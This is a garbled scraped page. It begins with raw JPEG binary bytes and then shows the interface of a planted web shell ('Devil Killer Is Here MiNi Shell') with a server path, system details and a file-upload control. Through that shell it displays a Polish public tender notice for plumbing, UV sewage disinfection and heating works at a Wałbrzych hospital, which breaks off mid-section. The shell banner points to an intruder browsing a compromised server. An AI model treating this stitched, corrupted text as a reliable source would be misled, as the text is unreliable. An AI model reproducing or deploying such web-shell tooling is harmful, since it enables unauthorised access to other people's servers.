JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230425/0019054801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych związanych z wykonaniem instalacji wodociągowej, kanalizacji sanitarnej z systemem oczyszczania ścieków, ciepła technologicznego oraz centralnego ogrzewania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalistyczny Szpital im. dra Alfreda Sokołowskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890047446</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sokołowskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałbrzych</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-309</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">malgorzata.kuczynska@zdrowie.walbrzych.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zdrowie.walbrzych.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych związanych z wykonaniem instalacji wodociągowej, kanalizacji sanitarnej z systemem oczyszczania ścieków, ciepła technologicznego oraz centralnego ogrzewania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-33ffa8f2-e338-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00190548</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00078160/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont prosektorium dla obiektów szpitalnych przy ul. Sokołowskiego i Batorego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdrowie_walbrzych <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Minimalne wymagania techniczne<br/>umożliwiające korzystanie ze Strony platformazakupowa.pl to przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej<br/>dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości co<br/>najmniej 256 kbit/s. Platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli.<br/>2. W celu założenia Konta Użytkownika na platformazakupowa.pl, konieczne jest posiadanie przez Użytkownika aktywnego konta<br/>poczty elektronicznej (e-mail).<br/>3. Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów<br/>przy maksymalnej wielkości 150 MB.<br/>4. Składając ofertę zaleca się zaplanowanie złożenia jej z wyprzedzeniem minimum 24h, aby zdążyć w terminie przewidzianym na jej<br/>złożenie w przypadku siły wyższej, jak np. awaria platformazakupowa.pl, awaria Internetu, problemy techniczne związane z brakiem<br/>np. aktualnej przeglądarki, itp.<br/>Więcej informacji na temat wymagań technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji<br/>elektronicznej znajduje sie w Instrukcji dla wykonawców platformazakupowa.pl oraz Regulaminie platformazakupowa.pl,<br/>stanowiących Załącznik nr 10 i 10a do SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>Dz. U. UE. L. 2016.119.1 z dnia 4 maja 2016r., dalej jako „RODO” informujemy, że:<br/>Administratorem Pani/Pana danych osobowych przetwarzanych w związku z przeprowadzaniem postępowania o udzielenie<br/>zamówienia na „Wykonanie robót budowlanych związanych z wykonaniem instalacji wodociągowej, kanalizacji sanitarnej z<br/>systemem oczyszczania ścieków, ciepła technologicznego oraz centralnego ogrzewania dla remontowanego Zakładu Patomorfologii<br/>w części Prosektorium Specjalistycznego Szpitala im. dra A. Sokołowskiego w Wałbrzychu” - Zp/34/TP/23 jest Specjalistyczny<br/>Szpital im dra Alfreda Sokołowskiego w Wałbrzychu ul. Sokołowskiego 4, 58-309 Wałbrzych, telefon 74/6489600, e-mail:<br/>sekretariat@zdrowie.walbrzych.pl<br/>1. Informujemy, że Administrator wyznaczył Inspektora Ochrony Danych Osobowych (IODO), kontakt możliwy jest za pośrednictwem<br/>e-mail: iodo@zdrowie.walbrzych.pl, numer (74) 6489600 oraz osobę zastępującą IODO, kontakt za pośrednictwem e-mail:<br/>iod@zdrowie.walbrzych.pl, numer (74) 6489696 lub korespondencyjnie na adres Administratora.<br/>2. Celem przetwarzania danych osobowych jest wypełnienie obowiązków prawnych ciążących na jednostkach sektora finansów<br/>publicznych, w tym na podmiocie leczniczym, w zakresie przeprowadzania postępowania o udzielenie zamówienia publicznego:<br/>„Wykonanie robót budowlanych związanych z wykonaniem instalacji wodociągowej, kanalizacji sanitarnej z systemem oczyszczania<br/>ścieków, ciepła technologicznego oraz centralnego ogrzewania dla remontowanego Zakładu Patomorfologii w części Prosektorium<br/>Specjalistycznego Szpitala im. dra A. Sokołowskiego w Wałbrzychu” - Zp/34/TP/23 na podstawie art. 4 pkt. 1 ustawy z dnia 11<br/>września 2019r. Prawo zamówień publicznych (tj. Dz.U. z 2021 poz. 1129 z późn. zm.). Przesłanką legalizującą przetwarzanie tych<br/>danych osobowych na gruncie „RODO” jest art. 6 ust. 1 lit. c. W wyjątkowych przypadkach w tym samym celu będziemy również<br/>przetwarzać dane osobowe dotyczące wyroków skazujących lub naruszeń prawa na podstawie art. 108 ust. 1 w związku z art. 124<br/>pkt. 1 cytowanej wyżej ustawy. Przesłanką legalizującą przetwarzanie tych danych osobowych na gruncie „RODO” jest art. 10.<br/>3. Dane przekazane przez Panią/Pana będą podlegały udostępnieniu następującym kategoriom odbiorców: organy władzy<br/>publicznej, organy ścigania, inne uprawnione podmioty, w zakresie i celach, gdy występują z żądaniem w oparciu o stosowną<br/>podstawę prawną w tym np. Krajowa Izba Odwoławcza, inne podmioty, które świadczą usługi na rzecz administratora np. podmiotom<br/>świadczącym obsługę prawną, podmiotom, z którymi administrator zawarł umowę przetwarzania danych w imieniu administratora,<br/>serwisanci lub Poczta Polska.<br/>4. Administrator nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>5. Dane osobowe, wynikające ze zgromadzonej dokumentacji zamówienia wraz z załącznikami, będą przechowywane przez okres 4<br/>lat licząc od dnia zakończenia postępowania o udzielenie zamówienia a w przypadku obowiązywania umowy w sprawie zamówienia<br/>publicznego powyżej 4 lat, przechowywana jest przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. Jeżeli<br/>środki finansowe zostały pozyskane z funduszy europejskich wówczas taka dokumentacja będzie przechowywana przez okres<br/>wskazany w tych dokumentach przyznających te środki i mogą wynosić okresy dłuższe niż 4 lata. Po tym terminie dane będą<br/>protokolarnie niszczone.<br/>... w związku z ograniczeniami więcej w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp/34/TP/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót budowlanych związanych wykonaniem instalacji wodociągowej, kanalizacji sanitarnej z systemem<br/>oczyszczania ścieków, ciepła technologicznego oraz centralnego ogrzewania zgodnie z załączonymi rysunkami J-1, J-2, J-3<br/>oraz części opisowej dla remontowanego Zakładu Patomorfologii w części prosektorium Specjalistycznym Szpitalu im. dra<br/>A. Sokołowskiego w Wałbrzychu.<br/>Dokumentacja projektowa została opracowana przez Pracownię Projektową Instalacyjną mgr inż. Magdalena Klonowska –<br/>Nieczypor z siedzibą w Wałbrzychu przy ul. Ludowej 1 C.<br/>Zakres prac budowlanych będzie obejmował:<br/>- wykonanie robót demontażowych istniejącej i zbędnej instalacji wodociągowej, sanitarnej, ciepła technologicznego oraz<br/>centralnego ogrzewania<br/>- wykonanie instalacji wodociągowej, sanitarnej z systemem oczyszczania ścieków, ciepła technologicznego oraz<br/>centralnego ogrzewania zgodnie z załączonym Projektem Architektoniczno-Budowlanym .<br/>- pozostałe prace wyszczególnione w dokumentacji projektowej dotyczące przedmiotu zamówienia jak również wypełnienie<br/>wszelkich wymogów i zobowiązań z niej wynikających.<br/>W cenie ofertowej Wykonawca powinien uwzględnić wszystkie roboty budowlano-montażowe, koszty bezpośrednie i<br/>pośrednie związane z wszelkimi badaniami, pomiarami oraz działaniami zmierzającymi do wykonania przedmiotu<br/>zamówienia w sposób kompletny dla celu jakiemu ma służyć.<br/>Zamawiający bezwzględnie wymaga dokonania wizji lokalnej i potwierdzenia jej odbycia przez uprawnionego pracownika<br/>Szpitala.<br/>Instalacja kanalizacji sanitarnej z systemem dezynfekcji ścieków.<br/>Ścieki sanitarne z przyborów zbierane są do pionów i odprowadzane są do istniejącego przyłącza. Zaprojektowano<br/>odprowadzenie ścieków z pomieszczeń sekcyjnych, które oczyszczane będą w urządzeniu UV-hosp-2 do dezynfekcji<br/>ścieków, a następnie włączone do instalacji kanalizacji i odprowadzane istniejącym przyłączem.<br/>Aby zapewnić prawidłowe funkcjonowanie instalacji, w najniekorzystniejszych punktach należy zamontować zawory<br/>powietrzne „DURGO” lub tradycyjne wywiewki. Wszystkie przewody wewnątrz budynków wykonać z rur i kształtek z PVC.<br/>Przejścia przez przegrody konstrukcyjne wykonać w rurze osłonowej stalowej uszczelnionej szczeliwem. Po zakończeniu<br/>prac murarskich i wykończeniowych, zamocować i podłączyć armaturę oraz elementy wyposażenia sanitarnego ( biały<br/>montaż ). Podłączenia przyborów wykonać zgodnie z rysunkami. Na odcinkach pionowych i poziomych montować rewizje.<br/>Wszystkie przewody wewnątrz budynków wykonać z rur i kształtek niskoszumowych AS z PVC. Przejścia przez przegrody<br/>konstrukcyjne wykonać w rurze osłonowej stalowej uszczelnionej szczeliwem. Po zakończeniu prac murarskich i<br/>wykończeniowych, zamocować i podłączyć armaturę oraz elementy wyposażenia sanitarnego ( biały montaż ). Podłączenia<br/>przyborów wykonać zgodnie z rysunkami. Na odcinkach pionowych i poziomych montować rewizje. Wywiewki montować<br/>60cm powyżej poziomu dachu. Przewody należy montować do konstrukcji za pomocą uchwytów izolowanych od rury<br/>podkładką elastyczną, co 1m poniżej średnicy 110mm, co 1,25 powyżej średnicy 110mm.<br/>Surowe ścieki z Zakładu Patomorfologii będą doprowadzone do przepompowni technologicznej PT za pomocą kanału<br/>sanitarnego Dz160mm PVC. Przepompownia PT wyposażona będzie w jedną pompę z nożem tnącym. Przepompownia<br/>powinna mieć retencję nie mniejszą niż Vret = 0,3 m3. Przepompownię PT zaprojektowano jako zbiornik o wymiarach Lw x<br/>Bw x Hw = 0,9 x 0,7 x 1,20m, wykonany z tworzywa sztucznego o odpowiedniej wytrzymałości. Zbiornik ten będzie<br/>umieszczony pod posadzką pomieszczenia nr 008 w żelbetowej komorze o wymiarach Lw x Bw x Hw = 1,3 x 1,1 x 1,04m.<br/>Komora ta, po zamontowaniu wszystkich rurociągów zostanie podwyższona do poziomu posadzki. Przepompownia zostanie<br/>przykryta blachą ryflowaną, zlicowaną z kafelkami posadzki. Ścieki z przepompowni PT tłoczone będą urządzenia<br/>dezynfekcyjnego zamontowanego w pomieszczeniu 008, gdzie poddawane będą naświetlaniu promieniami UV w reaktorach<br/>zestawionych szeregowo w jednym rzędzie.<br/>W przypadku awarii lub wyłączenia z eksploatacji urządzenia dezynfekcyjnego, ścieki surowe będą retencjonowane w<br/>zbiorniku przepompowni PT. Zbiornik powinien mieć retencję awaryjną nie mniejszą niż V_AW=0,3m3. Dodatkowo w<br/>zbiorniku przepompowni PT będzie zamontowany przelew awaryjny do kanalizacji sanitarnej szpitala. O przepełnieniu w<br/>przepompowni PT obsługa będzie powiadomiona alarmem z szafy automatyki SA.<br/>Zdezynfekowane ścieki odprowadzane będą do istniejącego rurociągu Φ160 i dalej do kanalizacji miejskiej.<br/>Rurociąg odprowadzający ścieki po dezynfekcji Dz110 mm PVC, z klapą burzową Dz110<br/>(umożliwiającą pobór prób do badań laboratoryjnych, przy pomocy zaworu probierczego);<br/>Urządzenia i podzespoły mające bezpośredni kontakt ze ściekami powinny być wykonane z materiałów odpornych na<br/>korozje np. ze stali nierdzewnej, odpowiednich tworzyw sztucznych itp. We wszystkich kluczowych dla eksploatacji i<br/>bezpieczeństwa punktach umieszczone będą czujniki podłączone do szafy SA (AKPiA). System monitoringu będzie<br/>kontrolować wszelkie nieprawidłowości funkcjonowania urządzeń Stacji UV. Stacja wyposażona będzie w przepływomierz<br/>elektromagnetyczny, umożliwiający pomiar wydatku ścieków przepływających do dezynfekcji. Sygnały z przepływomierza<br/>umożliwiają równomierne podawanie ścieków do komór dezynfekcyjnych. Sterowanie, monitoring i kontrola pracy całej<br/>instalacji powinny być realizowane przez sterownik PLC, z panelem dotykowym, w którym powinny być dostępne informacje<br/>techniczne dotyczące najważniejszych parametrów urządzeń, w tym bieżących wskazań czasów pracy najważniejszych<br/>podzespołów oraz wykonania czynności eksploatacyjnych takich jak: czyszczenie, wymiana promienników UV itp. Zasilanie<br/>oraz podłączenie aparatury kontrolno-pomiarowej i automatyki wg projektu warsztatowego dostawcy technologii dezynfekcji<br/>ścieków. Do układu wentylacji mechanicznej nawiewno-wywiewnej należy włączyć zbiornik przepompowni PT oraz komory<br/>reaktorów.<br/>Instalacje należy wykonać zgodnie z projektem oraz:<br/>wymaganiami COBRTI Instal, instrukcjami montażowymi producentów zastosowanych technologii i materiałów, Prawem<br/>budowlanym, przepisami bhp i p-poż.<br/>Po zakończeniu montażu instalacji wykonać właściwe próby zgodnie z Wymaganiami COBRTI Instal.<br/>Przebieg tras instalacji, średnice, materiał, spadki, odległości według części rysunkowej.<br/>Wszystkie metalowe elementy instalacji ogrzewczej należy objąć elektrycznymi połączeniami wyrównawczymi.<br/>Obowiązkiem wykonawców instalacji jest dostarczenie wymaganych, aktualnych atestów (dopuszczeń, certyfikatów)<br/>wszystkich zastosowanych materiałów i urządzeń. Wszelkie urządzenia oraz narzędzia muszą być oznaczone znakiem<br/>bezpieczeństwa lub CE, a w stosunku do urządzeń, które nie podlegają obowiązkowi zgłaszania do certyfikacji na znak<br/>bezpieczeństwa i oznaczenia tym znakiem, wykonawca jest zobowiązany dostarczyć odpowiednią deklarację dostawcy,<br/>zgodności tych wyrobów z Polskimi Normami oraz wymaganiami określonymi właściwymi przepisami.<br/>Wykonawca musi przeprowadzić rozruch instalacji, przeszkolić obsługę, opracować instrukcję obsługi i eksploatacji oraz<br/>przedstawić badania skuteczności wykonanej w Szpitalu instalacji. Próbki powinny być pobrane przez laboratorium przed i<br/>po reaktorach dezynfekcyjnych.<br/>System nie może generować żadnych odpadów, wymagających usuwania w procesie technologicznym.<br/>Nie jest dopuszczalne włączenie do systemu innych metod dezynfekcji (termiczne, chemiczne itp.)<br/>Wszelkie nazwy własne produktów, materiałów i urządzeń przywołane w niniejszym projekcie należy traktować jako<br/>przykładowe, służące określeniu pożądanego standardu wykonania i określeniu niezbędnych właściwości i wymogów<br/>założonych w dokumentacji technicznej dla danych rozwiązań. Dopuszcza się zastąpienie proponowanych rozwiązań jako<br/>równoważnych (w oparciu o wyroby innych producentów), pod warunkiem spełnienia określonych wymagań pod względem<br/>parametrów technicznych, funkcjonalnych i użytkowych wskazanych szczegółowo w dokumentacji projektowej.<br/>Akceptacje urządzeń i materiałów do rozwiązań projektowych są możliwe po uzyskaniu jednoznacznej akceptacji<br/>Zamawiającego, jedynie w przypadku rozwiązań o wskazanej skuteczności 99.9% wobec bakterii wskaźnikowych , z próbek<br/>pobranych przed i po dezynfekcji oraz co najmniej równorzędnych konstrukcyjnie, funkcjonalnie i technicznie. Propozycji<br/>takiej winna towarzyszyć kompletna informacja: rysunki, obliczenia, specyfikacje, proponowana technologia budowy oraz<br/>tabela porównawcza parametrów – są to niezbędne informacje do oceny przez nadzór nad budową.<br/>Instalacja wodociągowa.<br/>Pomieszczenia Zakładu Patomorfologii są istniejące i posiadają instalację wodociągową, ciepła woda użytkowa uzyskiwana<br/>jest w istniejącym węźle cieplnym. W opracowaniu zaprojektowano wymianę instalacji na nową.<br/>Instalacja wody pitnej wykonana będzie z rur PP, a wody ciepłej z rur PP stabilizowanych perforowaną wkładką aluminiową.<br/>Wody dostarczana będzie do wszystkich urządzeń bytowo-gospodarczych tzn. umywalek, zlewów, płuczek i natrysków oraz<br/>zaworów czerpalnych.<br/>Przewody rozprowadzające wody będą prowadzone w bruzdach, izolowane.<br/>Przejścia przez przegrody konstrukcyjne wykonać w rurze osłonowej stalowej uszczelnionej szczeliwem, a przez przegrody<br/>wydzielenia pożarowego wykonać przejścia ogniochronne o odporności ogniowej wymaganej dla tego elementu.<br/>Wszystkie elementy instalacji wodnej powinny mieć atest PZH, dopuszczający do przepływu wody pitnej.<br/>Instalacja wody ppoż. jest istniejąca i pozostaje bez zmian.<br/>Ogłoszenie nr 2023/BZP 00121626/01 z dnia 2023-03-06<br/>2023-03-06 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>... w związku z ograniczeniami więcej w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia punktów dla kryterium cena:<br/><br/>Cena najniższa otrzymuje automatycznie 60 pkt.<br/>Przeliczenie punktów dla oferty o wyższej cenie:<br/>Cena najniższa z ofert<br/>--------------------------------- x 60 pkt = ilość punktów dla oferty ocenianej <br/>Cena wyższa z oferty ocenianej o wyższej cenie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, 